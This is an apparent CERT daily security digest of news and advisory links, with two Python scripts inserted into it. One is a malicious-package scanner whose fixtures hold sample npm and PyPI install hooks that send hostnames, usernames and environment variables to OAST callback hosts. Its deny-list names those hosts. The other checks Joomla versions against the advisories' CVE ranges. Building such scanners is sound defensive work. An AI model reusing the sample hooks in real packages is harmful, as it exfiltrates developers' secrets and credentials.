Daily summary - 07.01.2025

End-of-Day report

Timeframe: Friday 03-01-2025 18:00 - Tuesday 07-01-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a

News

Windows 10 users urged to upgrade to avoid "security fiasco"

Cybersecurity firm ESET is urging Windows 10 users to upgrade to Windows 11 or Linux to avoid a "security fiasco" as the 10-year-old operating system nears the end of support in October 2025.

https://www.bleepingcomputer.com/news/microsoft/windows-10-users-urged-to-upgrade-to-avoid-security-fiasco/

Cryptocurrency wallet drainers stole $494 million in 2024

Scammers stole $494 million worth of cryptocurrency in wallet drainer attacks last year that targeted more than 300,000 wallet addresses.

https://www.bleepingcomputer.com/news/security/cryptocurrency-wallet-drainers-stole-494-million-in-2024/

Chinese hackers also breached Charter and Windstream networks

More U.S. companies have been added to the list of telecommunications firms hacked in a wave of breaches by a Chinese state-backed threat group tracked as Salt Typhoon.

https://www.bleepingcomputer.com/news/security/charter-and-windstream-among-nine-us-telecoms-hacked-by-china/

Despite strong criticism: controversial UN cybercrime convention adopted

Digital rights activists had warned in vain against the adoption of the convention. It threatens to give authoritarian states access to digital evidence.

https://www.golem.de/news/trotz-starker-kritik-umstrittene-un-cybercrime-konvention-verabschiedet-2501-192183.html

After China's Salt Typhoon, the reconstruction starts now

If 40 years of faulty building gets blown down, don't rebuild with the rubble. Opinion: When a typhoon devastates a land, it takes a while to understand the scale of the destruction. Disaster relief kicks in, communications are rebuilt, and news flows out. Salt Typhoon is ..

https://www.theregister.com/2025/01/06/opinion_column_cybersec/

MediaTek rings in the new year with a parade of chipset vulns

Manufacturers should have had ample time to apply the fixes. MediaTek kicked off the first full working week of the new year by disclosing a bevy of security vulnerabilities, including a critical remote code execution bug affecting 51 chipsets.

https://www.theregister.com/2025/01/06/mediatek_chipset_vulnerabilities/

Patch day: important security updates protect Android devices

Google and other manufacturers of Android devices have closed several critical vulnerabilities in various Android versions.

https://www.heise.de/news/Patchday-Schadcode-Luecken-bedrohen-Android-12-13-14-und-15-10229347.html

Serious vulnerabilities in SonicWall SSL-VPN - actively exploited

The vendor SonicWall has informed its customers that some devices are affected by security vulnerabilities. Particularly noteworthy is a vulnerability that is already being attacked, in which attackers ... the authentication ..

https://www.cert.at/de/warnungen/2025/1/schwewiegende-sicherheitslucken-in-sonicwall-ssl-vpn-aktiv-ausgenutzt

UN aviation agency actively investigating cybercriminal's claimed data breach

The International Civil Aviation Organization (ICAO) said it was responding to claims of a data breach "allegedly linked to a threat actor known for targeting international organizations."

https://therecord.media/united-nations-icao-investigating-data-breach

Critical Next.js Authorization Bypass Vulnerability

This specifically affects pages directly under the application's root directory. Example:
[Not affected] hxxps[://]example[.]com
[Affected] hxxps[://]example[.]com/foo
[Not affected] hxxps[://]example[.]com/foo/bar
Successful exploitation of this vulnerability allows a remote unauthenticated ..

https://www.truesec.com/hub/blog/critical-next-js-authorization-bypass-vulnerability

Warning: allegedly leaked GTA San Andreas source code comes with malware

The source code of the Rockstar Games title GTA San Andreas is currently allegedly being offered for download on the Internet. The first indications seem to have appeared online yesterday (see e.g. the article Rockstar reportedly faces another ..

https://www.borncity.com/blog/2025/01/06/achtung-angeblich-geleakter-gta-san-andreas-source-code-mit-schadsoftware/

New PhishWP Plugin on Russian Forum Turns Sites into Phishing Pages

SlashNext has discovered a malicious WordPress plugin, PhishWP, which creates convincing fake payment pages to steal your credit card information, 3DS codes, and personal data.

https://hackread.com/phishwp-plugin-russian-hacker-forum-phishing-sites/

U.S. Sanctions Chinese Cybersecurity Firm Over Cyberattacks

US sanctions Beijing-based Integrity Technology Group for aiding "Flax Typhoon" hackers in cyberattacks on American infrastructure, freezing assets ..

https://hackread.com/us-sanctions-chinese-cybersecurity-firm-cyberattacks/

CVE-2024-4577: Windows Encoding Gone Wrong

CVE-2024-4577 is a critical vulnerability in Windows-based PHP installations, affecting CGI configurations, that allows remote code execution.

https://www.bitsight.com/blog/cve-2024-4577-windows-encoding-gone-wrong

Weaponizing OAST: How Malicious Packages Exploit npm, PyPI, and RubyGems for Data Exfiltration and Recon

Socket researchers uncover how threat actors weaponize Out-of-Band Application Security Testing (OAST) techniques across the npm, PyPI, and RubyGems ecosystems to exfiltrate sensitive data and remotely probe developer environments. Over the last year, Socket's threat research team has continually observed and identified malicious JavaScript, Python, and Ruby packages ..

https://socket.dev/blog/weaponizing-oast-how-malicious-packages-exploit-npm-pypi-and-rubygems
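As an added example, not code from Socket's post or from their tooling, here is a small Python triage scanner for the pattern the post describes: a package that hooks the install step and, from that hook, collects host or environment details and sends them to an OAST callback host. The list of OAST service domains and the reconnaissance call patterns are assumptions chosen for illustration, and the npm and PyPI samples at the bottom are constructed, not real packages.

```python
import json
import re

# Assumed hostnames of common OAST/callback services (not a list from the
# Socket post); extend with your own deny data.
OAST_DOMAINS = (
    "oast.fun", "oast.pro", "oast.live", "oast.site", "oast.online", "oast.me",
    "oastify.com", "interact.sh", "burpcollaborator.net", "dnslog.cn",
    "pipedream.net", "requestbin.net", "canarytokens.com",
)
# npm lifecycle scripts that run automatically during `npm install`.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

OAST_HOST_RE = re.compile(
    r"(?i)\b((?:[a-z0-9-]+\.)*(?:" + "|".join(re.escape(d) for d in OAST_DOMAINS) + r"))\b"
)
# Assumed call patterns that collect host/user/environment details (JS, Python, Ruby).
RECON_RE = re.compile(
    r"os\.hostname\(\)|os\.userInfo\(\)|os\.networkInterfaces\(\)|process\.env\b"
    r"|socket\.gethostname\(\)|getpass\.getuser\(\)|os\.environ\b|platform\.uname\(\)"
    r"|Socket\.gethostname|ENV\.to_h|Etc\.getlogin"
)
# PyPI: a setup.py that overrides an install-time command runs code on `pip install`.
PYPI_HOOK_RE = re.compile(
    r"cmdclass\s*=\s*\{[^}]*[\"'](install|develop|egg_info|build_py)[\"']", re.S
)


def scan_source(text):
    """Findings in one file: OAST hostnames referenced and recon calls present."""
    findings = [("oast-domain", m.group(1)) for m in OAST_HOST_RE.finditer(text)]
    recon = sorted(set(RECON_RE.findall(text)))
    if recon:
        findings.append(("recon", ", ".join(recon)))
    return findings


def classify(findings):
    """A callback domain alone, or an install hook combined with recon, is suspicious;
    an install hook by itself only warrants a manual look."""
    kinds = {kind for kind, _ in findings}
    if "oast-domain" in kinds or ("install-hook" in kinds and "recon" in kinds):
        return "suspicious"
    return "review" if "install-hook" in kinds else "clean"


def assess_npm_package(manifest_text, files):
    """Combine install hooks in package.json with what the hooked scripts do.
    `files` maps path -> content of the package's files. Returns (verdict, findings)."""
    findings = []
    scripts = json.loads(manifest_text).get("scripts", {})
    for hook, cmd in scripts.items():
        if hook in NPM_INSTALL_HOOKS:
            findings.append(("install-hook", f"{hook}: {cmd}"))
            findings += scan_source(cmd)
            for path, content in files.items():
                if path in cmd:  # the hook command invokes this file
                    findings += scan_source(content)
    return classify(findings), findings


def assess_setup_py(setup_text):
    """Same idea for a PyPI source package's setup.py."""
    findings = scan_source(setup_text)
    hook = PYPI_HOOK_RE.search(setup_text)
    if hook:
        findings.append(("install-hook", f"custom cmdclass for '{hook.group(1)}'"))
    return classify(findings), findings


# Constructed samples (fictional package names), modelled on the post's description.
SAMPLE_PACKAGE_JSON = '{"name": "left-padz", "version": "1.0.3", "scripts": {"postinstall": "node setup.js"}}'
SAMPLE_SETUP_JS = """const os = require('os'), https = require('https');
const body = JSON.stringify({h: os.hostname(), u: os.userInfo().username, e: process.env});
https.request({host: 'c4d1e2.oast.fun', method: 'POST', path: '/'}).end(body);
"""
SAMPLE_SETUP_PY = '''from setuptools import setup
from setuptools.command.install import install
import socket, urllib.request
class Hook(install):
    def run(self):
        urllib.request.urlopen("http://" + socket.gethostname() + ".x9k2.interact.sh/")
        install.run(self)
setup(name="reqeusts", version="0.0.1", cmdclass={"install": Hook})
'''

if __name__ == "__main__":
    print(assess_npm_package(SAMPLE_PACKAGE_JSON, {"setup.js": SAMPLE_SETUP_JS}))
    print(assess_setup_py(SAMPLE_SETUP_PY))
```

Run it over an unpacked tarball before installing; a "suspicious" verdict is a reason to inspect the hooked script by hand, not proof of malice, since legitimate packages also use install hooks (native builds, for example).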

Vulnerabilities

[20250103] - Core - Read ACL violation in multiple core views

Project: Joomla!
SubProject: CMS
Impact: Low
Severity: Moderate
Probability: Low
Versions: 3.9.0-3.10.19-elts, 4.0.0-4.4.9, 5.0.0-5.2.2
Exploit type: ACL Violation
Reported Date: 2024-08-26
Fixed Date: 2025-01-07
CVE Number: CVE-2024-40749
Description: Improper Access Controls allows access to protected views.
Affected Installs: Joomla! CMS versions 3.9.0-3.10.19-elts, 4.0.0-4.4.9, 5.0.0-5.2.2
Solution: Upgrade to version 3.10.20-elts, 4.4.10 or 5.2.3
Contact: The JSST at the Joomla! Security Centre.

https://developer.joomla.org:443/security-centre/956-20250103-core-read-acl-violation-in-multiple-core-views.html

[20250102] - Core - XSS vector in the id attribute of menu lists

Project: Joomla!
SubProject: CMS
Impact: Low
Severity: Moderate
Probability: Low
Versions: 3.0.0-3.10.19-elts, 4.0.0-4.4.9, 5.0.0-5.2.2
Exploit type: XSS
Reported Date: 2024-09-19
Fixed Date: 2025-01-07
CVE Number: CVE-2024-40748
Description: Lack of output escaping in the id attribute of menu lists.
Affected Installs: Joomla! CMS versions 3.0.0-3.10.19-elts, 4.0.0-4.4.9, 5.0.0-5.2.2
Solution: Upgrade to version 3.10.20-elts, 4.4.10 or 5.2.3
Contact: The JSST at the Joomla! Security Centre.

https://developer.joomla.org:443/security-centre/955-20250102-core-xss-vector-in-the-id-attribute-of-menu-lists.html

[20250101] - Core - XSS vectors in module chromes

Project: Joomla!
SubProject: CMS
Impact: Low
Severity: Moderate
Probability: Low
Versions: 4.0.0-4.4.9, 5.0.0-5.2.2
Exploit type: XSS
Reported Date: 2024-08-29
Fixed Date: 2025-01-07
CVE Number: CVE-2024-40747
Description: Various module chromes didn't properly process inputs, leading to XSS vectors.
Affected Installs: Joomla! CMS versions 4.0.0-4.4.9, 5.0.0-5.2.2
Solution: Upgrade to version 4.4.10 or 5.2.3
Contact: The JSST at the Joomla! Security Centre.
Reported By: Catalin Iovita

https://developer.joomla.org:443/security-centre/954-20250101-core-xss-vectors-in-module-chromes.html
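As an added example (not code from the Joomla! project or from the advisories), the following Python script encodes the affected ranges and fix releases stated in the three advisories above and answers, for an installed version string, which of the three CVEs apply and which release to upgrade to. Note that the ranges differ: CVE-2024-40748 starts at 3.0.0, CVE-2024-40749 at 3.9.0, and CVE-2024-40747 does not cover the 3.x line at all. Reading the running version out of the MAJOR/MINOR/PATCH_VERSION constants in libraries/src/Version.php is an assumption about the file layout of Joomla 4 and 5, and the sample file contents are constructed.

```python
import re

# Affected ranges and fix releases copied from the three Joomla! advisories
# above (20250101/20250102/20250103). Ranges are inclusive; "-elts" marks the
# 3.x extended long-term support line.
ADVISORIES = {
    "CVE-2024-40747": ["4.0.0-4.4.9", "5.0.0-5.2.2"],
    "CVE-2024-40748": ["3.0.0-3.10.19-elts", "4.0.0-4.4.9", "5.0.0-5.2.2"],
    "CVE-2024-40749": ["3.9.0-3.10.19-elts", "4.0.0-4.4.9", "5.0.0-5.2.2"],
}
FIXED_RELEASE = {3: "3.10.20-elts", 4: "4.4.10", 5: "5.2.3"}

# "<low>-<high>[-suffix]" as printed in the advisories.
RANGE_RE = re.compile(r"^(\d+(?:\.\d+)*)-(\d+(?:\.\d+)*)(?:-[A-Za-z0-9]+)?$")


def parse_version(version):
    """'3.10.19-elts' -> (3, 10, 19). A '-elts'/'-rc1' suffix is dropped and
    missing components are zero-padded, so '5.2' compares as 5.2.0."""
    core = version.strip().split("-", 1)[0]
    parts = [int(p) for p in core.split(".")]
    return tuple((parts + [0, 0, 0])[:3])


def parse_range(spec):
    """'3.9.0-3.10.19-elts' -> ((3, 9, 0), (3, 10, 19))."""
    m = RANGE_RE.match(spec)
    if not m:
        raise ValueError(f"unparseable range: {spec!r}")
    return parse_version(m.group(1)), parse_version(m.group(2))


def affected_by(version):
    """Sorted CVE IDs whose affected ranges contain `version`."""
    v = parse_version(version)
    hits = []
    for cve, ranges in ADVISORIES.items():
        if any(low <= v <= high for low, high in map(parse_range, ranges)):
            hits.append(cve)
    return sorted(hits)


def required_upgrade(version):
    """Fix release for the installed major line, or None when not affected."""
    if not affected_by(version):
        return None
    return FIXED_RELEASE.get(parse_version(version)[0])


# Assumption: Joomla 4/5 expose the running version as PHP class constants in
# libraries/src/Version.php; this pulls MAJOR/MINOR/PATCH out of that file.
VERSION_CONST_RE = re.compile(r"const\s+(MAJOR|MINOR|PATCH)_VERSION\s*=\s*(\d+)\s*;")


def version_from_version_php(php_source):
    """Reconstruct 'MAJOR.MINOR.PATCH' from the constants in Version.php."""
    found = {name: int(value) for name, value in VERSION_CONST_RE.findall(php_source)}
    if set(found) != {"MAJOR", "MINOR", "PATCH"}:
        raise ValueError("MAJOR/MINOR/PATCH_VERSION constants not found")
    return f"{found['MAJOR']}.{found['MINOR']}.{found['PATCH']}"


# Constructed sample of the relevant lines from a Joomla 4.4.9 Version.php.
SAMPLE_VERSION_PHP = """<?php
    public const MAJOR_VERSION = 4;
    public const MINOR_VERSION = 4;
    public const PATCH_VERSION = 9;
    public const EXTRA_VERSION = '';
"""

if __name__ == "__main__":
    installed = version_from_version_php(SAMPLE_VERSION_PHP)
    print(installed, affected_by(installed), "->", required_upgrade(installed))
```

Point version_from_version_php at the real file of each site you administer; a fleet of Joomla installs can then be triaged in one pass, with the 3.x hosts standing out because their fix only exists in the ELTS line.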

Security Vulnerabilities fixed in Firefox ESR 115.19

https://www.mozilla.org/en-US/security/advisories/mfsa2025-03/

Security Vulnerabilities fixed in Firefox ESR 128.6

https://www.mozilla.org/en-US/security/advisories/mfsa2025-02/

Security Vulnerabilities fixed in Firefox 134

https://www.mozilla.org/en-US/security/advisories/mfsa2025-01/

Upcoming CVE for End-of-Life Node.js Versions

https://nodejs.org/en/blog/vulnerability/upcoming-cve-for-eol-versions